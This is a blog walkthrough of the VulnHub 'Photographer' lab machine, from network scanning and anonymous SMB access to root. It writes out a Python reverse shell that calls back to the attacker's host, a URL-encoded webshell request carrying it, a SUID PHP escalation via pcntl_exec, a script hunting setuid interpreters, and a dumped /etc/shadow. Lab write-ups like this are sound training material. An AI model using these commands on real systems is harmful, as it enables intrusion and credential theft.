VulnHub Photographer Walkthrough – PHP FTW!

My first streamed vulnerable machine was VulnHub Photographer, and I've finally finished the write-up!

VulnHub Photographer Walkthrough - Introduction

I haven't solved a VulnHub box since Casino Royale, so it was nice to get back into the swing of things.

This was a fairly simple box, but the PHP execution at the end definitely gave me some trouble.

You can find the VM here, and I'd say it is easy to intermediate difficulty.

Enumeration

First, I ran a ping sweep to see where the box was on my network.

root@kali:~/photographer# nmap -sn 192.168.5.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-13 19:30 EDT
Nmap scan report for pfSense.sanctuary (192.168.5.1)
Host is up (0.00020s latency).
MAC Address: 00:01:xx:xx:xx:xx (PC Partner)
Nmap scan report for 192.168.5.100

...

Host is up (0.0035s latency).
MAC Address: 38:F9:D3:CE:3F:89 (Unknown)
Nmap scan report for 192.168.5.131

Next, I ran a quick port scan, and discovered that ports 80, 139, 445, and 8000 were open on the target.

root@kali:~/photographer# nmap -A 192.168.5.131
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-13 19:33 EDT
Nmap scan report for 192.168.5.131
Host is up (0.00074s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Photographer by v1n1v131r4
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Koken 0.22.24
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: daisa ahomi
MAC Address: 08:00:27:C4:FF:DD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: PHOTOGRAPHER

Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: 0s
|_nbstat: NetBIOS name: PHOTOGRAPHER, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: photographer
|   NetBIOS computer name: PHOTOGRAPHER\x00
|   Domain name: \x00
|   FQDN: photographer
|_  System time: 2020-08-13T19:33:24-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-08-13 19:33:24
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   0.74 ms 192.168.5.131

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.38 seconds

Finally, I ran enum4linux against the target (although I accidentally forgot to save the command output).

Initial Foothold

First, I used smbclient to connect to the open share that I discovered with enum4linux. As you can see, there were two files that I had unauthenticated access to, so I grabbed them.

root@kali:~/photographer# smbclient \\\\192.168.5.131\\sambashare
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jul 20 21:30:07 2020
  ..                                  D        0  Tue Jul 21 05:44:25 2020
  mailsent.txt                        N      503  Mon Jul 20 21:29:40 2020
  wordpress.bkp.zip                   N 13930308  Mon Jul 20 21:22:23 2020

        278627392 blocks of size 1024. 264268400 blocks available
smb: \> get mailsent.txt
getting file \mailsent.txt of size 503 as mailsent.txt (23.4 KiloBytes/sec) (average 23.4 KiloBytes/sec)
smb: \> get wordpress.bkp.zip
getting file \wordpress.bkp.zip of size 13930308 as wordpress.bkp.zip (38213.0 KiloBytes/sec) (average 36085.7 KiloBytes/sec)
smb: \> exit

While the WordPress backup didn't have anything too interesting, the mailsent.txt file contained either a hint or a password.

root@kali:~/photographer# cat mailsent.txt
Message-ID: <4129F3CA.2020509@dc.edu>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi 
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)

When I looked at port 80, I found a basic website without anything terribly interesting.

VulnHub Photographer - Port 80

That said, port 8000 had a CMS that was running some sort of blog and photo album.

Port 8000 Koken

With a bit of google searching, I discovered the default Koken administrator login.

Koken Administrative portal

Using the e-mail address from the discovered mailsent file (daisa@photographer.com) along with the possible password (babygirl), I was able to login to the Koken administrative panel!

VulnHub Photographer - Successful Koken authentication

Looking around the panel, I found a place to upload images, along with a likely arbitrary file upload vulnerability.

Arbitrary file upload

After uploading my malicious PHP image, I used the pentestmonkey reverse shell cheat sheet and created a Python reverse shell.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.5.132",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

When I visited my uploaded PHP shell with the embedded command, I received my reverse shell!

http://192.168.5.131:8000/storage/originals/3a/ad/image.php?cmd=%70%79%74%68%6f%6e%20%2d%63%20%27%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%22%31%39%32%2e%31%36%38%2e%35%2e%31%33%32%22%2c%34%34%34%34%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%70%3d%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%22%2f%62%69%6e%2f%73%68%22%2c%22%2d%69%22%5d%29%3b%27

root@kali:~/photographer# nc -lvp 4444
listening on [any] 4444 ...
192.168.5.131: inverse host lookup failed: Unknown host
connect to [192.168.5.132] from (UNKNOWN) [192.168.5.131] 54132
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege Escalation

First, I grabbed the user flag from the daisa home directory, for my "proof" of exploitation.

www-data@photographer:/home$ cat daisa/user.txt
cat daisa/user.txt
d41d8cd98f00b204e9800998ecf8427e

Next, after searching the filesystem for SUID binaries, I found that PHP was SUID root.

www-data@photographer:/home$ ls -al /usr/bin/php7.2
ls -al /usr/bin/php7.2
-rwsr-xr-x 1 root root 4883680 Jul  9 13:40 /usr/bin/php7.2
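Reproducing that search, as an added example that is not the post's own code: this walks the filesystem the way `find / -perm -4000 -user root -type f 2>/dev/null` would, then flags the hits that hand over a shell on their own. The list of shell-capable names is a small hand-picked assumption for illustration, not an authoritative catalogue.

```python
"""Hunt for setuid-root binaries and flag the ones that are interpreters.

Added example, not from the original post. SHELL_CAPABLE is an assumed,
hand-picked set; extend it from GTFOBins or your own notes.
"""
import os
import stat
from typing import Iterable, Iterator, List, NamedTuple


class Entry(NamedTuple):
    path: str
    mode: int   # st_mode as returned by lstat
    uid: int    # st_uid


# A setuid interpreter keeps the elevated effective UID and will exec() whatever
# you ask, so these are immediate wins rather than "go read the binary".
SHELL_CAPABLE = {"php", "python", "perl", "ruby", "node",
                 "bash", "sh", "dash", "find", "vim", "nmap"}


def is_setuid_root(mode: int, uid: int) -> bool:
    """Regular file, setuid bit set, owned by root (what -perm -4000 -user root matches)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == 0


def walk(root: str = "/") -> Iterator[Entry]:
    """Yield every regular file under root. Unreadable directories are skipped
    and symlinks are lstat'ed, not followed, so /usr/bin/php -> /etc/alternatives/php
    is reported as a link while the real /usr/bin/php7.2 shows its own mode bits."""
    pseudo = {"/proc", "/sys", "/dev"}
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in pseudo]
        for name in filenames:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            yield Entry(p, st.st_mode, st.st_uid)


def base_name(path: str) -> str:
    """'/usr/bin/php7.2' -> 'php', '/usr/bin/python3.8' -> 'python':
    strip a trailing version so versioned interpreters still match."""
    return os.path.basename(path).rstrip("0123456789.")


def find_suid_root(entries: Iterable[Entry]) -> List[Entry]:
    return [e for e in entries if is_setuid_root(e.mode, e.uid)]


def shell_capable(entries: Iterable[Entry]) -> List[str]:
    """Paths of setuid-root hits whose name is on the interpreter list."""
    return [e.path for e in find_suid_root(entries) if base_name(e.path) in SHELL_CAPABLE]


if __name__ == "__main__":
    for e in find_suid_root(walk("/")):
        tag = "  <-- interpreter, gives a shell" if base_name(e.path) in SHELL_CAPABLE else ""
        print(f"{stat.filemode(e.mode)} uid={e.uid} {e.path}{tag}")
```

On the box above this prints `-rwsr-xr-x uid=0 /usr/bin/php7.2  <-- interpreter, gives a shell` among the usual passwd/sudo/mount entries. The classification is separated from the walk so it can be run over a saved `ls -l` or `find -ls` listing from a target you no longer have a shell on.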

While I was able to execute inline PHP commands, it took me a lot of trial and error to use this for escalation (as you can see from the excerpt below).

www/html/koken/storage/originals/3a/ad$ php -r 'system("/bin/sh")'
www-data@photographer:/var/www$ php -r 'system("/bin/sh")'
php -r 'system("/bin/sh")'
PHP Parse error:  syntax error, unexpected end of file in Command line code on line 1
www-data@photographer:/var/www$ php -r 'system("/bin/sh");'
php -r 'system("/bin/sh");'
id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
exit
exit
www-data@photographer:/var/www$ php -r 'system("/bin/sh -p");'
php -r 'system("/bin/sh -p");'
id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
exit
exit
www-data@photographer:/var/www$ php -r 'exec("/bin/sh -p");'
php -r 'exec("/bin/sh -p");'
id
id
exit
exit
www-data@photographer:/var/www$ which php
which php
/usr/bin/php
www-data@photographer:/var/www$ ls -al /usr/bin/php
ls -al /usr/bin/php
lrwxrwxrwx 1 root root 21 Jul 20 19:35 /usr/bin/php -> /etc/alternatives/php
www-data@photographer:/var/www$ /usr/bin/php7.2 -r 'exec("/bin/sh -p");'
/usr/bin/php7.2 -r 'exec("/bin/sh -p");'
id
id
exit
exit
www-data@photographer:/var/www$ /usr/bin/php7.2 -r 'system("/bin/sh -p");'
/usr/bin/php7.2 -r 'system("/bin/sh -p");'
id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
exit
exit
www-data@photographer:/var/www$ ls -al /usr/bin/php7.2
ls -al /usr/bin/php7.2
-rwsr-xr-x 1 root root 4883680 Jul  9 13:40 /usr/bin/php7.2
www-data@photographer:/var/www$ /usr/bin/php7.2 -r 'passthru("/bin/sh -p");'
/usr/bin/php7.2 -r 'passthru("/bin/sh -p");'
id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
exit
exit

That said, in the end, a StackOverflow post helped me to use pcntl_exec for execution. The difference is that pcntl_exec() is a direct execve(): the PHP process, still carrying the effective UID 0 it got from the setuid bit, is replaced by /bin/sh, and `-p` tells that shell not to reset its effective UID back to the real one. system(), exec() and passthru() instead spawn the command through an intermediate `sh -c` that is started without `-p`, and on this box that is where the effective UID was lost, which is why every one of those attempts came back as plain www-data (exec() also captures the command's output instead of passing it through, so the two exec() attempts printed nothing at all).

www-data@photographer:/var/www$ php -r 'pcntl_exec("/bin/sh", ["-p"]);'
php -r 'pcntl_exec("/bin/sh", ["-p"]);'
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)

With my root privileges, I was able to grab the proof.txt file and complete the box!

# cat proof.txt
cat proof.txt
                                                                   
                                .:/://::::///:-`                                
                            -/++:+`:--:o:  oo.-/+/:`                            
                         -++-.`o++s-y:/s: `sh:hy`:-/+:`                         
                       :o:``oyo/o`. `      ```/-so:+--+/`                       
                     -o:-`yh//.                 `./ys/-.o/                      
                    ++.-ys/:/y-                  /s-:/+/:/o`                    
                   o/ :yo-:hNN                   .MNs./+o--s`                   
                  ++ soh-/mMMN--.`            `.-/MMMd-o:+ -s                   
                 .y  /++:NMMMy-.``            ``-:hMMMmoss: +/                  
                 s-     hMMMN` shyo+:.    -/+syd+ :MMMMo     h                  
                 h     `MMMMMy./MMMMMd:  +mMMMMN--dMMMMd     s.                 
                 y     `MMMMMMd`/hdh+..+/.-ohdy--mMMMMMm     +-                 
                 h      dMMMMd:````  `mmNh   ```./NMMMMs     o.                 
                 y.     /MMMMNmmmmd/ `s-:o  sdmmmmMMMMN.     h`                 
                 :o      sMMMMMMMMs.        -hMMMMMMMM/     :o                  
                  s:     `sMMMMMMMo - . `. . hMMMMMMN+     `y`                  
                  `s-      +mMMMMMNhd+h/+h+dhMMMMMMd:     `s-                   
                   `s:    --.sNMMMMMMMMMMMMMMMMMMmo/.    -s.                    
                     /o.`ohd:`.odNMMMMMMMMMMMMNh+.:os/ `/o`                     
                      .++-`+y+/:`/ssdmmNNmNds+-/o-hh:-/o-                       
                        ./+:`:yh:dso/.+-++++ss+h++.:++-                         
                           -/+/-:-/y+/d:yh-o:+--/+/:`                           
                              `-///////////////:`                               
                                                                                

Follow me at: http://v1n1v131r4.com


d41d8cd98f00b204e9800998ecf8427e

And, as usual, I grabbed the shadow file in case anyone wants to check these passwords one day.

cat /etc/shadow
root:$6$W89kMm7z$g5EDOgkjt/COwdYSXsgcKl2sWE1MIAqf6Gk0fnB6fv8OQCWk9VpwuZNkC17X0mbyc97UcAttT4ma1XI9Vknz91:18463:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:17954:0:99999:7:::
uuidd:*:17954:0:99999:7:::
lightdm:*:17954:0:99999:7:::
whoopsie:*:17954:0:99999:7:::
avahi-autoipd:*:17954:0:99999:7:::
avahi:*:17954:0:99999:7:::
dnsmasq:*:17954:0:99999:7:::
colord:*:17954:0:99999:7:::
speech-dispatcher:!:17954:0:99999:7:::
hplip:*:17954:0:99999:7:::
kernoops:*:17954:0:99999:7:::
pulse:*:17954:0:99999:7:::
rtkit:*:17954:0:99999:7:::
saned:*:17954:0:99999:7:::
usbmux:*:17954:0:99999:7:::
agi:$6$6.N5TR1M$41gUgxyG3m9njeVdW9vW6hgi/YwwgFJXEXwTNaH1DDVXgCX0AAayr7np2IWUYDvJ3gnSbsUHeplBfTUVRetXs0:18463:0:99999:7:::
daisa:$6$mxTjNcEI$YhSL7MEyC1zUQa8Xo0CaZBeOSE2PmEHrk1Zf9M20.7Lu1s/IvXkkryme7st2ju73DpzQGCtv8owDUC4KmX47R.:18463:0:99999:7:::
mysql:!:18463:0:99999:7:::

Video Highlight

If you'd rather watch the stream highlight rather than read all this text, then you can find it here.

To catch me live, be sure to follow me on Twitch!

VulnHub Photographer Walkthrough - Conclusion

This was a fun box, and a great start to my hacking streams.

I've done this for about 4 weeks so far, and completed over 10 boxes!

Be sure to follow the stream and watch every Thursday, but let me know if there is anything else that you want to see.

doyler (GitHub, Twitter)
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.


Filed under Security Not Included
